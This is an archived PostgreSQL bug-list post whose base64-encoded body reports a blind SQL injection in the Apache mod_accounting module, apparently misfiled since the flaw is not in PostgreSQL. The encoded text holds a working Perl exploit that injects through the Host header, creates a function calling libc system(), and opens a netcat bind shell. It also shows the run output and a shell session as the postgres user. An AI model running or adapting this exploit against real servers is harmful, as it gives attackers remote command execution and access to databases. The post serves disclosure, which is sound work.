BUG #14318: remote blind SQL injection vulnerability - Mailing list pgsql-bugs
| From | soufiane.boussali@efet.ac.ma |
|---|---|
| Subject | BUG #14318: remote blind SQL injection vulnerability |
| Date | |
| Msg-id | 20160908212903.20024.71036@wrigleys.postgresql.org Whole thread Raw |
| Responses |
Re: BUG #14318: remote blind SQL injection vulnerability
(Tom Lane <tgl@sss.pgh.pa.us>)
|
| List | pgsql-bugs |
VGhlIGZvbGxvd2luZyBidWcgaGFzIGJlZW4gbG9nZ2VkIG9uIHRoZSB3ZWJz aXRlOgoKQnVnIHJlZmVyZW5jZTogICAgICAxNDMxOApMb2dnZWQgYnk6ICAg ICAgICAgIHNvdWZpYW5lIGJvdXNzYWxpCkVtYWlsIGFkZHJlc3M6ICAgICAg c291ZmlhbmUuYm91c3NhbGlAZWZldC5hYy5tYQpQb3N0Z3JlU1FMIHZlcnNp b246IDkuNnJjMQpPcGVyYXRpbmcgc3lzdGVtOiAgIE1BQyBPUyBYIEVsIENh cGl0YW4gMTAuMTEuNgpEZXNjcmlwdGlvbjogICAgICAgIAoKbW9kX2FjY291 bnRpbmcgaXMgYSB0cmFmZmljIGFjY291bnRpbmcgbW9kdWxlIGZvciBBcGFj aGUgMS4zLnggd2hpY2gNCnJlY29yZHMgdHJhZmZpYyBudW1iZXJzIGluIGEg ZGF0YWJhc2UuIEJvdGggTXlTUUwgYW5kIFBvc3RncmVTUUwgZGF0YWJhc2UN CnR5cGVzIGFyZSBzdXBwb3J0ZWQuIEl0IHN1cHBvcnRzIGFyYml0cmFyeSBk YXRhYmFzZSBkZXNpZ25zIGFzIHRyYWZmaWMNCnJlY29yZGluZyBpcyBwZXJm b3JtZWQgdmlhIGEgdXNlciBkZWZpbmVkIHF1ZXJ5IGluIHRoZSBBcGFjaGUK Y29uZmlndXJhdGlvbg0KdXNpbmcgcGxhY2Vob2xkZXJzIGZvciByZWNlaXZl ZCB2YWx1ZXMuIFRoZSBmb2xsb3dpbmcgaXMgYW4gZXhhbXBsZQ0KY29uZmln dXJhdGlvbjoNCg0KPFZpcnR1YWxIb3N0IF9kZWZhdWx0XzoqPSIiPg0KRG9j dW1lbnRSb290ICIvdmFyL3d3dy8iDQpPcHRpb25zIEluZGV4ZXMNCkFjY291 bnRpbmdRdWVyeUZtdCAiSU5TRVJUIElOVE8gYWNjb3VudGluZyBWQUxVRVMo IGN1cnJlbnRfdGltZSwgJXIsICVzLA0KJyV1JywgJyVoJyApOyINCkFjY291 bnRpbmdEYXRhYmFzZSBhY2NvdW50aW5nDQpBY2NvdW50aW5nRGF0YWJhc2VE cml2ZXIgcG9zdGdyZXMNCkFjY291bnRpbmdEQkhvc3QgbG9jYWxob3N0IDU0 MzINCkFjY291bnRpbmdMb2dpbkluZm8gYWNjdCBhY2N0DQo8L1ZpcnR1YWxI b3N0Pg0KDQpBcyB1c2VyIHN1cHBsaWVkIHZhbHVlcyBhcmUgbm90IHNhbml0 aXNlZCBiZWZvcmUgYmVpbmcgdXNlZCBpbiB0aGUNCnBsYWNlaG9sZGVyIHZh bHVlcyBpdCBpcyBwb3NzaWJsZSBmb3IgYW4gYXR0YWNrZXIgdG8gc3VwcGx5 IG1hbGljb3VzCnZhbHVlcw0KdG8gcGVyZm9ybSBibGluZCBTUUwgaW5qZWN0 aW9uLg0KDQpEZXNjcmlwdGlvbg0KDQpUaGUgU1FMIGluamVjdGlvbiBvY2N1 cnMgZHVlIHRvIGEgdXNlciBzdXBwbGllZCBIVFRQIGhlYWRlciBiZWluZyB1 c2VkIGluDQp0aGUgcXVlcnkgd2l0aG91dCBzYW5pdGlzYXRpb24uIFRoZSBt b2R1bGUgdXNlcyBhIHNpbXBsZSBzdHJpbmcNCmNvbmNhdGluYXRpb24gYXBw cm9hY2ggdG8gbW9kaWZ5IHRoZSBwbGFjZWhvbGRlcnMgaW4gdGhlIHVzZXIg ZGVmaW5lZApxdWVyeQ0KYmVmb3JlIHNlbmRpbmcgaXQgdG8gdGhlIGRhdGFi YXNlLiBUaGlzIGNvZGUgY2FuIGJlIGxvY2F0ZWQgaW4NCm1vZF9hY2NvdW50 aW5nLmM6DQoNCjQwOTogLy8gYnVpbGQgdGhlIHF1ZXJ5IHN0cmluZyBmcm9t IHRoZSB0ZW1wbGF0ZQ0KNDEwOiB3aGlsZSggcHRyICkgew0KNDExOiBjaGFy IG5leHQ7DQo0MTI6DQo0MTM6IG5leHQgPSBzdHJjaHIoIHB0ciwgJyUnICk7 DQo0MTQ6DQo0MTU6IGlmKCBuZXh0ICkgew0KNDE2OiBjaGFyIHRtcFsgMiBd Ow0KNDE3Og0KNDE4Og0KbmV4dCsrID0gJ1wwJzsNCjQxOToNCjQyMDogc3dp dGNoKCBuZXh0KysgKSB7DQo0MjE6DQo0MjI6IGNhc2UgJ2gnOg0KNDIzOiBx dWVyeSA9IGFwX3BzdHJjYXQoIHAsIHF1ZXJ5LCBwdHIsIGNmZy0+U2VydmVy TmFtZSA/DQpjZmctPlNlcnZlck5hbWUgOiAiLSIsIE5VTEwgKTsNCjQyNDog YnJlYWs7DQo0MjU6DQo0MjY6IGNhc2UgJ3MnOg0KNDI3OiBxdWVyeSA9IGFw X3BzdHJjYXQoIHAsIHF1ZXJ5LCBwdHIsIHNlbnQsIE5VTEwgKTsNCjQyODog YnJlYWs7DQo0Mjk6DQo0MzA6IGNhc2UgJ3InOg0KNDMxOiBxdWVyeSA9IGFw X3BzdHJjYXQoIHAsIHF1ZXJ5LCBwdHIsIHJlY3ZkLCBOVUxMICk7DQo0MzI6 IGJyZWFrOw0KNDMzOg0KNDM0OiBjYXNlICd1JzoNCjQzNTogcXVlcnkgPSBh cF9wc3RyY2F0KCBwLCBxdWVyeSwgcHRyLCBnZXRfdXNlciggciApLCBOVUxM DQopOw0KNDM2OiBicmVhazsNCjQzNzoNCjQzODogZGVmYXVsdDoNCjQzOTog dG1wWzBdID0gbmV4dFsgLTEgXTsNCjQ0MDogdG1wWzFdID0gJ1wwJzsNCjQ0 MToNCjQ0MjogcXVlcnkgPSBhcF9wc3RyY2F0KCBwLCBxdWVyeSwgcHRyLCB0 bXAsIE5VTEwgKTsNCjQ0MzogYnJlYWs7DQo0NDQ6IH0NCjQ0NToNCjQ0Njog bmV4dFsgLTIgXSA9ICclJzsNCjQ0NzoNCjQ0ODogfSBlbHNlDQo0NDk6IHF1 ZXJ5ID0gYXBfcHN0cmNhdCggcCwgcXVlcnksIHB0ciwgTlVMTCApOw0KNDUw Og0KNDUxOiBwdHIgPSBuZXh0Ow0KNDUyOiB9DQo0NTM6DQo0NTQ6ICggREJE cml2ZXJzWyBjZmctPkRCRHJpdmVyIF0uUXVlcnkgKSggY2ZnLCBzZXJ2ZXIs IHAsIHF1ZXJ5ICk7DQo0NTU6DQo0NTY6IGNmZy0+UmVjZWl2ZWQgPSBjZmct PlNlbnQgPSAwOw0KDQpJdCBpcyBpbXBvcnRhbnQgdG8gbm90ZSB0aGF0IHRo ZSBkYXRhYmFzZSBxdWVyeSB0YWtlcyBwbGFjZSBhZnRlciB0aGUgcGFnZQ0K aGFzIGJlZW4gc2VydmVkLCBoZW5jZSB0aGVyZSBpcyBubyBlYXN5IHdheSB0 byBkZXRlcm1pbmUgaWYgYSBwYXJ0aWN1bGFyDQppbmplY3Rpb24gbWV0aG9k IHdhcyBzdWNjZXNzZnVsIGFwYXJ0IGZyb20gdXNpbmcgYW4gb3V0IG9mIGJh bmQgYXBwcm9hY2guDQpIb3dldmVyLCBhcyB0aGUgaW5qZWN0aW9uIG9jY3Vy cyBpbiBhbiBpbnNlcnQgc3RhdGVtZW50IGl0IGlzIGxpa2VseSB0aGF0DQp0 aGUgc3VjY2Vzc2Z1bCBpbmplY3Rpb24gdmVjdG9yIGlzIG9uZSBvZiBhYm91 dCBhIGhhbmRmdWwgb2YgbGlrZWx5DQpjYW5kaWRhdGVzLg0KDQpJbXBhY3QN Cg0KQW4gYXR0YWNrZXIgaXMgb25seSBsaW1pdGVkIGJ5IHRoZSBjYXBhYmls aXRpZXMgb2YgdGhlIGRhdGFiYXNlDQpjb25maWd1cmF0aW9uIGFuZCBtYXkg YmUgYWJsZSB0byByZWFkLCBhZGQsIGFsdGVyIG9yIGRlbGV0ZSBkYXRhIGZy b20geW91cg0KZGF0YWJhc2UocyksIHJlYWQgb3Igd3JpdGUgYXJiaXRyYXJ5 IGZpbGVzIG9yIGV2ZW4gZXhlY3V0ZSBjb21tYW5kcyBvbiB0aGUNCnNlcnZl ciBnaXZlbiBhIHByaXZpbGVnZWQgZGF0YWJhc2UgYWNjb3VudC4NCg0KUHJv b2Ygb2YgQ29uY2VwdA0KDQpyb290QGJ0On4vc3Bsb2l0LWRldiMgY2F0IG1v ZF9hY2NvdW50aW5nLXJjZS5wbA0KIS91c3IvYmluL3BlcmwNClBvQyBvZiBi bGluZCBTUUwgaW5qZWN0aW9uIGluIHRoZSBtb2RfYWNjb3VudGluZy8wLjUg QXBhY2hlIG1vZHVsZQ0KSW5qZWN0aW9uIGNhbiBvY2N1ciB2aWEgdGhlIEhv c3QgaGVhZGVyDQpBcyB0aGUgaW5qZWN0aW9uIG9jY3VycyBpbiBhIHVzZXIg ZGVmaW5lZCBpbnNlcnQgc3RhdGVtZW50IGEgYml0IG9mIHRyaWFsDQoNCmFu ZCBlcnJvciBpcyByZXF1aXJlZA0KRGF0YWJhc2Ugb3BlcmF0aW9ucyBvY2N1 cnMgYXN5bmNyb25vdXMgdG8gcGFnZSByZXNwb25zZSBzbyB0aW1pbmcgYXR0 YWNrcw0KDQp3b250IHdvcmsNClRoaXMgb25lIGlzIGNvbXBsZXRlbHkgYmxp bmQNCkRCIGNhbiBiZSBteXNxbCBvciBwb3N0Z3JlcywgdGhpcyBQb0Mgb25s eSBjb3ZlcnMgcG9zdGdyZXMNClBvQyBleGVjdXRlcyBuZXRjYXQgdG8gbGlz dGVuIG9uIHBvcnQgNDQ0NCAocmVxdWlyZXMgZGJhIHByaXZpbGVnZXMpDQoN CnVzZSBJTzo6U29ja2V0OjpJTkVUOw0KDQpwcmludCAiIy0tLS0tLS0tLS0t LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0jXG4iOw0KcHJp bnQgInwgbW9kX2FjY291bnRpbmcvMC41IFBvQyBleHBsb2l0IGJ5IFxATXJN dWdpd2FyYSB8XG4iOw0KcHJpbnQgInwgaHR0cHM6Ly9Nck11Z2l3YXJhLmdp dGh1Yi5pbyB8XG4iOw0KcHJpbnQgIiMtLS0tLS0tLS0tQ29tbWFuZCBleGVj dXRpb24gdmlhIFNRTGktLS0tLS0tLS0tI1xuIjsNCnByaW50ICJbKl0gRW51 bWVyYXRpbmcgYmxpbmQgaW5qZWN0aW9uIHZlY3RvcnM6XG4iOw0KDQpteSBA ZW5kaW5ncyA9ICgiJykpOyIsICciKSk7JywgIikpOyIsICInKTsiLCAnIik7 JywgIik7IiwgIic7IiwgJyI7JywiOyIpOw0KVGhlc2Ugc2hvdWxkIHRlcm1p bmF0ZSBtb3N0IGluc2VydCBzdGF0ZW1lbnRzDQpteSBAZW5kaW5ncyA9ICgg IicpOyIgKTsNCg0KbXkgJHNoZWxsID0gJ25jIC1sbnAgNDQ0NCAtZSAvYmlu L3NoJzsNCm15ICRjbnQgPSAwOw0KbXkgJGNvbnRlbnQgPSAiQ1JFQVRFIE9S IFJFUExBQ0UgRlVOQ1RJT04gc3lzdGVtKGNzdHJpbmcpIFJFVFVSTlMgaW50 IEFTDQonL2xpYi9saWJjLnNvLjYnLCAnc3lzdGVtJyBMQU5HVUFHRSAnQycg U1RSSUNUOyBTRUxFQ1Qgc3lzdGVtKCckc2hlbGwnKTsiOw0KZm9yZWFjaCAk ZW5kIChAZW5kaW5ncykgew0KJGNudCsrOw0KbXkgJHNvY2sgPSBJTzo6U29j a2V0OjpJTkVULT5uZXcoIiRBUkdWWzBdOiRBUkdWWzFdIikgb3IgZGllICJV bmFibGUgdG8NCmNvbm5lY3QgdG8gJEFSR1ZbMF06JEFSR1ZbMV06ICQhXG4i Ow0KbXkgJHN0ciA9ICJHRVQgLyBIVFRQLzEuMVxyXG5Ib3N0OiAkQVJHVlsw XSRjbnQkZW5kICRjb250ZW50IC0tDQpcclxuXHJcbiI7ICMgZnJvbSBteXNx bC51c2VyIGludG8gb3V0ZmlsZSAnL3RtcC9wb2Nwb2MkY250LnR4dCc7IC0t DQpcclxuXHJcbiI7DQpwcmludCAiWy1dIFRyeWluZyAkZW5kXG4iOw0KcHJp bnQgJHNvY2sgJHN0cjsNCiNwcmludCAiU2VudCAkZW5kXG4iOw0KY2xvc2Ug KCRzb2NrKTsNCn0NCnByaW50ICJbKl0gRG9uZSwgcmVtb3RlIHNlcnZlciBz aG91bGQgaGF2ZSBleGVjdXRlZCAkc2hlbGxcbiI7DQpFeGVjdXRpb24gb2Yg UG9DOg0KDQpyb290QGJ0On4vc3Bsb2l0LWRldiMgbmMgMTkyLjE2OC41OC4x MzggNDQ0NA0KKFVOS05PV04pIFsxOTIuMTY4LjU4LjEzOF0gNDQ0NCAoPykg OiBDb25uZWN0aW9uIHJlZnVzZWQNCnJvb3RAYnQ6fi9zcGxvaXQtZGV2IyBw ZXJsIG1vZF9hY2NvdW50aW5nLXJjZS5wbCAxOTIuMTY4LjU4LjEzOCA4MA0K LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t LQ0KDQp8IG1vZF9hY2NvdW50aW5nLzAuNSBQb0MgZXhwbG9pdCBieSBATXJN dWdpd2FyYSB8DQp8IHd3dy5qdXN0YW5vdGhlcmhhY2tlci5jb20gfA0KLS0t LS0tLS0tLUNvbW1hbmQgZXhlY3V0aW9uIHZpYSBTUUxpLS0tLS0tLS0tLQ0K DQpbKl0gRW51bWVyYXRpbmcgYmxpbmQgaW5qZWN0aW9uIHZlY3RvcnM6DQpb LV0gVHJ5aW5nICcpKTsNClstXSBUcnlpbmcgIikpOw0KWy1dIFRyeWluZyAp KTsNClstXSBUcnlpbmcgJyk7DQpbLV0gVHJ5aW5nICIpOw0KWy1dIFRyeWlu ZyApOw0KWy1dIFRyeWluZyAnOw0KWy1dIFRyeWluZyAiOw0KWy1dIFRyeWlu ZyA7DQpbKl0gRG9uZSwgcmVtb3RlIHNlcnZlciBzaG91bGQgaGF2ZSBleGVj dXRlZCBuYyAtbG5wIDQ0NDQgLWUgL2Jpbi9zaA0Kcm9vdEBidDp+L3NwbG9p dC1kZXYjIG5jIDE5Mi4xNjguNTguMTM4IDQ0NDQNCnB3ZA0KL3Zhci9saWIv cG9zdGdyZXMvZGF0YS9iYXNlLzE3MTQyDQppZA0KdWlkPTEwMShwb3N0Z3Jl cykgZ2lkPTEwNChwb3N0Z3JlcykgZ3JvdXBzPTEwNChwb3N0Z3JlcykNCmhv c3RuYW1lDQpNck11Z2l3YXJhDQpeYw0KDQpTb2x1dGlvbiA6DQoNCkFzIHRo ZSBtb2R1bGUgaXMgbm8gbG9uZ2VyIHN1cHBvcnRlZCwgZGlzY29udGludWUg dGhlIHVzZSBvZiB0aGlzIG1vZHVsZS4KCg==
pgsql-bugs by date: